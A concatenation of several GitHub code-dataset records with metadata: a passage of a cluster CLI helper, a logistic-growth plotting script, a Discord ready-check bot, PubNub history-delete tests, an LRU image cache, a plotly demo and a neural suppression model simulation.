self.logger.debug(f'Sorted Data => {data}')\n osimage = [\"OS Image\\n\"]\n fields, rows = [\"Tags\\n\"], [\"Details\\n\"]\n for key in data:\n fields.append(key[0])\n osimage.append(key[1]['osimage'])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n 
new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n if internal != \"name\":\n in_key = internal\n in_val = key[1][internal]\n if len(key[1]) == num:\n new_list.append(f'{in_key} = {in_val} \\n')\n else:\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, osimage, rows\n", "repo_name": "clustervision/luna2-cli", "sub_path": "luna/utils/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 40945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "luna.utils.log.Log.get_logger", "line_number": 37, "usage_type": "call"}, {"api_name": "luna.utils.log.Log", "line_number": 37, "usage_type": "name"}, {"api_name": "luna.utils.constant.BOOL_KEYS", "line_number": 45, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 46, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 50, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 52, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 54, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 64, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 65, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 69, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 73, "usage_type": "call"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 75, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 78, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 81, "usage_type": "call"}, {"api_name": "nested_lookup.nested_delete", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "nested_lookup.nested_update", "line_number": 89, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 91, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 108, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 108, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 108, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 110, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 120, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 121, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 124, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 125, "usage_type": "call"}, {"api_name": 
"luna.utils.rest.Rest", "line_number": 135, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 139, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 146, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 155, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 157, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 168, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 172, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 181, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 188, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 190, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 199, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 203, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 209, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 219, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 221, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 230, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 234, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 240, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 250, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 252, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 265, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 268, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 270, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 273, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 275, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 298, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 300, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 303, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 305, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 307, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 311, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 313, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 315, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 326, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 329, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 331, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 343, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 346, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 348, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 361, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 364, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 366, "usage_type": 
"call"}, {"api_name": "multiprocessing.Process", "line_number": 374, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 383, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 390, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 399, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 400, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 401, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 407, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 409, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 417, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 426, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 433, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 442, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 443, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 444, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 450, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 452, "usage_type": "call"}, {"api_name": "hostlist.expand_hostlist", "line_number": 463, "usage_type": "call"}, {"api_name": "hostlist.BadHostlist", "line_number": 465, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 505, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 541, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 542, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 543, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 548, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 557, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 558, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 566, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 568, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 579, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 586, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 588, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 590, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 592, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 594, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 596, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 632, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 687, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 688, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 700, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 701, "usage_type": "attribute"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 748, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 749, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 768, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 769, "usage_type": "call"}, {"api_name": 
"luna.utils.constant.EDITOR_KEYS", "line_number": 798, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 799, "usage_type": "call"}, {"api_name": "nested_lookup.nested_alter", "line_number": 810, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 824, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 860, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 901, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 947, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 980, "usage_type": "call"}]} +{"seq_id": "6230116645", "text": "#written using python2.7 (renamed .py to .txt)\n\n\n#created 2 plots (1 semilog,1 linear)\n#I decreased step size and increased time to get a longer plot\n\nimport matplotlib.pyplot as plt\n\ndef integrate(r,k):\n\tt=0 \n\tdx=.001 #small perturbation\n\tx=0.001 #initial x\n\tdt=.01\n\twhile t<12:\n\t\tdxdt=r*x*(1-x/k)/(k*r) #function\n\t\tx+= dxdt*dt/k #incrimenting x values\n\t\tt+=dt*r #incrimenting time values\n\t\t#plt.plot(t,x,'--bo')\n\t\tplt.ylabel(\"X(t)\")\n\t\tplt.xlabel(\"Time\")\n\t\tplt.semilogy(t,x,'--bo')\n\t#print(t,x)\nintegrate(4,30) ##r affects rise rate, k leads to asymptote \nintegrate(2,2)\nintegrate(1,4) \nintegrate(15,1)\nintegrate(20,5)\nplt.show()\n\n\n", "repo_name": "bpc5604/chaos", "sub_path": "HW03/hw03.py", "file_name": "hw03.py", "file_ext": "py", "file_size_in_byte": 654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "38610606928", "text": "import time, datetime\nimport sched\n\nimport discord\nfrom discord.ext import commands, tasks\n\nimport config\nimport embeds\n\npop_message: discord.message\n\n# keeping track of who's in a pop\npopped_members = []\nwaiting_members = []\n\n# ending timestamp\nend_time = \"\"\n\n\n# since these buttons only apply inside this handler they can be here\nclass ReadyButton(discord.ui.View):\n def __init__(self, head_text):\n super().__init__(timeout=None)\n self.header = head_text\n\n @discord.ui.button(label=\"Ready!\", style=discord.ButtonStyle.primary)\n async def ready_button(self, interaction: discord.Interaction, button: discord.ui.Button):\n await interaction.response.defer()\n accept_player(interaction.user)\n await interaction.message.edit(content=self.header,\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n\n\n@tasks.loop(seconds=1, count=config.queue_timer)\nasync def queue_timer():\n if len(waiting_members) == 0:\n queue_timer.stop()\n\n\n@queue_timer.after_loop\nasync def after_timer():\n return\n\n\n# remove a player from the list of un-accepted players when they ready\ndef accept_player(player):\n global waiting_members\n\n if player in waiting_members:\n 
waiting_members.remove(player)\n\n\n# seeing who in a pop is readying\nasync def afk_check_pop(channel, popped_players, new_players):\n global popped_members\n global waiting_members\n global pop_message\n global end_time\n\n # set up queue timer\n remaining_time = config.queue_timer\n\n end_time = f''\n\n scheduler = sched.scheduler(time.time, time.sleep)\n\n # mem issues w/ refs requires you to make copy here\n popped_members = popped_players.copy()\n waiting_members = new_players.copy()\n\n print(popped_members)\n\n # create a header listing match members so you can see who's actually in the match\n header = \"Match Ready For: \\n\"\n\n for member in popped_players:\n id = member.id\n header += f'<@{id}> '\n\n # this gets updated each loop cycle\n temp = header + \"\\nWaiting On: \\n \"\n\n for member in waiting_members:\n id = member.id\n temp += f'<@{id}> '\n\n temp += \"\\nTime Remaining: \" + str(remaining_time)\n\n # add message and reaction\n # copy needed to fix mem issues with async\n pop_message_temp = await channel.send(content=header, view=ReadyButton(header),\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n pop_message = pop_message_temp\n\n # start queue countdown\n await queue_timer.start()\n\n # remove the expired pop message\n await pop_message_temp.delete()\n\n return\n\n\n# clear popped members from memory\ndef clear_pop():\n global popped_members\n\n popped_members = []\n", "repo_name": "Acoliver102/Tonguelash", "sub_path": "pop_handler.py", "file_name": "pop_handler.py", "file_ext": "py", "file_size_in_byte": 3033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.message", "line_number": 10, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 21, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 27, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.ui.button", "line_number": 26, "usage_type": "call"}, {"api_name": "discord.ui", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ButtonStyle", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ext.tasks.loop", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.ext.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "config.queue_timer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "config.queue_timer", "line_number": 62, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "config.queue_timer", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sched.scheduler", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "34180895202", "text": "import unittest\nimport threading\n\nfrom pubnub.pubnub import PubNub\nfrom tests.helper import pnconf\n\n\nclass TestPubNubSuccessHistoryDelete(unittest.TestCase): # pylint: disable=W0612\n def setUp(self):\n self.event = threading.Event()\n\n def callback(self, response, status):\n self.response = response\n self.status = status\n self.event.set()\n\n def 
assert_success(self):\n self.event.wait()\n if self.status.is_error():\n self.fail(str(self.status.error_data.exception))\n self.event.clear()\n self.response = None\n self.status = None\n\n def test_success(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n\n def test_super_call(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch- |.* $\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n", "repo_name": "pubnub/python", "sub_path": "tests/integrational/native_threads/test_history_delete.py", "file_name": "test_history_delete.py", "file_ext": "py", "file_size_in_byte": 1063, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 155, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 10, "usage_type": "call"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 26, "usage_type": "argument"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 35, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 35, "usage_type": "argument"}]} +{"seq_id": "21963434324", "text": "from collections import OrderedDict\nfrom copy import deepcopy\nfrom typing import Any\n\nfrom pims.config import get_settings\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.cache = OrderedDict()\n self.capacity = capacity\n\n def get(self, key: str) -> Any:\n if key not in self.cache:\n return None\n else:\n self.cache.move_to_end(key)\n return self.cache[key]\n\n def put(self, key: str, value: Any) -> None:\n self.cache[key] = value\n self.cache.move_to_end(key)\n if len(self.cache) > self.capacity:\n self.cache.popitem(last=False)\n\n\nclass ImageLRUCache(LRUCache):\n def get(self, key: str) -> Any:\n image = super().get(key)\n if image is None:\n return None\n cloned = deepcopy(image)\n self.cache[key] = cloned\n return cloned\n\n\nIMAGE_CACHE = ImageLRUCache(get_settings().memory_lru_cache_capacity)\n", "repo_name": "Cytomine-ULiege/pims", "sub_path": "pims/cache/memory.py", "file_name": "memory.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.OrderedDict", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "pims.config.get_settings", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "27574655967", "text": "import plotly.express as px\nimport time\n\ndef Parallel_Coordinates_Plot():\n start_time = time.time()\n\n df = px.data.iris()\n fig = px.parallel_coordinates(df, color=\"species_id\", labels={\"species_id\": \"Species\",\n \"sepal_width\": \"Sepal Width\", \"sepal_length\": \"Sepal Length\",\n \"petal_width\": \"Petal Width\", \"petal_length\": \"Petal Length\", },\n color_continuous_scale=px.colors.diverging.Tealrose,\n color_continuous_midpoint=2)\n fig.update_layout(\n title='Parallel Coodinates Plot')\n\n end_time = round(time.time() - start_time, 3)\n print(str(end_time) + ' seconds 
Graphing data for Parallel_Coordinates_Plot')\n\n fig.show()", "repo_name": "AllenChildress/Python_Plotly_Demo", "sub_path": "Parallel_Coordinates_Plot.py", "file_name": "Parallel_Coordinates_Plot.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 5, "usage_type": "call"}, {"api_name": "plotly.express.data.iris", "line_number": 7, "usage_type": "call"}, {"api_name": "plotly.express.data", "line_number": 7, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 7, "usage_type": "name"}, {"api_name": "plotly.express.parallel_coordinates", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 8, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 11, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "38273194895", "text": "\"\"\"\nSimulate model with many parameters.\n\"\"\"\n\nimport os\nimport numpy as np\nfrom jaratoolbox import settings\nimport studyparams\nimport figparams\nimport model_suppression as suppmodel\nreload(suppmodel)\n\nfigName = 'figure_model'\ndataDir = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, figName)\n\n# -- Simulate model --\nnCells = 101\n\nRANDOMIZED = 1\nnp.random.seed(1)\n\ndef random_in_range(low,high,shape):\n \"\"\"Return equally distributed random numbers in specified range\"\"\"\n width = high-low\n randVec = width*np.random.rand(shape) + low\n return randVec\n\nif RANDOMIZED:\n nSamples = 200\n #rfWidths = {'PV':5, 'SOM':5, 'Thal':5}\n rfWidths = None\n# ampPVvec = random_in_range(-1, -30, nSamples)\n# ampSOMvec = random_in_range(-1, -30, nSamples)\n# stdThalvec = random_in_range(2, 5, nSamples)\n suppIndexVec = np.empty((3,nSamples)) # 3:Control, PV, SOM\n changeAtPeakVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n changeAtWNVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n \n oct_range = 6\n\n stdPVoct = 0.8 * (nCells-1)/oct_range\n ampPVvec = random_in_range(-1, -30, nSamples) \n ampSOMvec = random_in_range(-1, -30, nSamples) \n stdSOMvec = random_in_range(1, 2, nSamples)\n stdThalvec = random_in_range(.2, 1, nSamples)\n\n\n for inds in range(nSamples):\n wParams = {'ampPV':ampPVvec[inds], 'stdPV':stdPVoct, #'stdPV':10,\n 'ampSOM':ampSOMvec[inds], 'stdSOM':stdSOMvec[inds] * stdPVoct, #'stdSOM':20, \n 'ampThal':100, 'stdThal':stdThalvec[inds] * stdPVoct} #stdThalvec[inds] \n net = suppmodel.Network(nCells, wParams, rfWidths)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexVec[:,inds] = suppIndex\n changeAtPeakVec[:,inds] = changeAtPeak\n changeAtWNVec[:,inds] = changeAtWN\nelse:\n ampPVvec = np.arange(-2,-44, -4) # -20\n ampSOMvec = np.arange(-2,-44, -4) # -20\n stdThalvec = [5,7,9]#np.arange(3, 15, 2) # 6\n\n suppIndexAll = np.empty((3,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 3:Control, PV, SOM\n changeAtPeakAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n changeAtWNAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n\n for indPV,ampPV in enumerate(ampPVvec):\n for indSOM,ampSOM in 
enumerate(ampSOMvec):\n for indThal,stdThal in enumerate(stdThalvec):\n wParams = {'ampPV':ampPV, 'stdPV':10,\n 'ampSOM':ampSOM, 'stdSOM':30,\n 'ampThal':100, 'stdThal':stdThal}\n net = suppmodel.Network(nCells, wParams)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexAll[:,indPV,indSOM,indThal] = suppIndex\n changeAtPeakAll[:,indPV,indSOM,indThal] = changeAtPeak\n changeAtWNAll[:,indPV,indSOM,indThal] = changeAtWN\n nConds = len(ampPVvec)*len(ampSOMvec)*len(stdThalvec) \n suppIndexVec = suppIndexAll.reshape([3,nConds])\n changeAtPeakVec = changeAtPeakAll.reshape([2,nConds])\n changeAtWNVec = changeAtWNAll.reshape([2,nConds])\n\n \nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nmarkerSize = 3\n\n# -- Plot supp index --\nplt.subplot(2,2,1)\nplt.plot(suppIndexVec[0],suppIndexVec[1],'sb', mfc='none', ms=markerSize)\nplt.plot(suppIndexVec[0],suppIndexVec[2],'or', mfc='none', ms=markerSize)\nxLims = [-0.1,1.1]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Suppression Index (control)')\nplt.ylabel('Suppression Index (inactivation)')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\navgSIchangePV = np.median(suppIndexVec[1]-suppIndexVec[0])\navgSIchangeSOM = np.median(suppIndexVec[2]-suppIndexVec[0])\nplt.bar(1,avgSIchangePV, fc='w', ec='b', lw=2)\nplt.bar(2,avgSIchangeSOM, fc='w', ec='r', lw=2)\n\n\n# -- Plot change in response --\nplt.subplot(2,2,3)\nplt.plot(changeAtPeakVec[0,:],changeAtWNVec[0,:],'sb', mfc='none', ms=markerSize)\nplt.plot(changeAtPeakVec[1,:],changeAtWNVec[1,:],'or', mfc='none', ms=markerSize)\nxLims = [-50,1500]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Change in response to preferred bandwidth')\nplt.ylabel('Change in response to WN')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\n\n\n# -- Save data --\noutputFile = 'response_change_summary.npz'\noutputFullPath = os.path.join(dataDir,outputFile)\n\nnp.savez(outputFullPath, suppIndexVec=suppIndexVec,\n changeAtPeakVec=changeAtPeakVec, changeAtWNVec=changeAtWNVec,\n condLabels=condLabels)\nprint(\"Saved {}\".format(outputFullPath))\n", "repo_name": "sjara/jaratest", "sub_path": "common/2018acsup/generate_model.py", "file_name": "generate_model.py", "file_ext": "py", "file_size_in_byte": 5103, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings.FIGURES_DATA_PATH", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "figparams.STUDY_NAME", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 37, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 52, 
"usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 54, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 66, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 74, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 76, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", 